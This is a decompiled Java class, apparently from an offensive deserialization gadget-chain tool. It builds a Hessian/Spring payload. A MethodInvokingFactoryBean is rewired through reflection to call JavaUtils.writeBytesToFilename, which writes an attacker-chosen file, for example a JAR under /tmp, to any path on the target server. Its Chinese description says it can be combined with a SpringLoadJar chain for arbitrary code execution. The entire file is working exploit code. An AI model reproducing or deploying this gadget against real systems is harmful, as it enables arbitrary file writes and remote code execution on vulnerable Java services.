package com.ar3h.chains.gadget.impl.hessian.spring.ext;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.FileHelper;
import com.ar3h.chains.common.util.Reflections;
import com.sun.org.apache.xml.internal.security.utils.JavaUtils;
import org.springframework.beans.factory.config.MethodInvokingFactoryBean;

@GadgetAnnotation(name = "任意文件上传", description = "通过 org.springframework.beans.factory.config.MethodInvokingFactoryBean 实现调用任意方法\n本链调用 com.sun.org.apache.xml.internal.security.utils.JavaUtils 实现任意文件写入\n之后可配合 SpringLoadJar 链实现任意代码执行", dependencies = {"org.springframework:spring-context"})
@GadgetTags(tags = {Tag.HessianSpringChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/spring/ext/SpringUpload.class */
public class SpringUpload extends SpringLinuxExec {

    @Param(name = "上传目标文件路径", description = "/tmp/test.jar")
    public String targetFile;

    @Param(name = "本地读取文件路径", description = "/path/to/x.jar")
    public String localFile;
    private byte[] data = null;

    @Override // com.ar3h.chains.gadget.impl.hessian.spring.ext.SpringLinuxExec
    public Object makeBean() throws Exception {
        if (this.data == null) {
            this.data = FileHelper.fileGetContent(this.localFile);
        }
        MethodInvokingFactoryBean methodInvokingFactoryBean = new MethodInvokingFactoryBean();
        methodInvokingFactoryBean.setSingleton(false);
        methodInvokingFactoryBean.setTargetObject(JavaUtils.class);
        Reflections.setFieldValue(methodInvokingFactoryBean, "methodObject", JavaUtils.class.getMethod("writeBytesToFilename", String.class, byte[].class));
        Reflections.setFieldValue(methodInvokingFactoryBean, "beanClassLoader", null);
        methodInvokingFactoryBean.setArguments(this.targetFile, this.data);
        return methodInvokingFactoryBean;
    }

    @Override // com.ar3h.chains.gadget.impl.hessian.spring.ext.SpringLinuxExec, com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.BEAN_NAME_KEY, "beanName123");
        return getObject();
    }
}
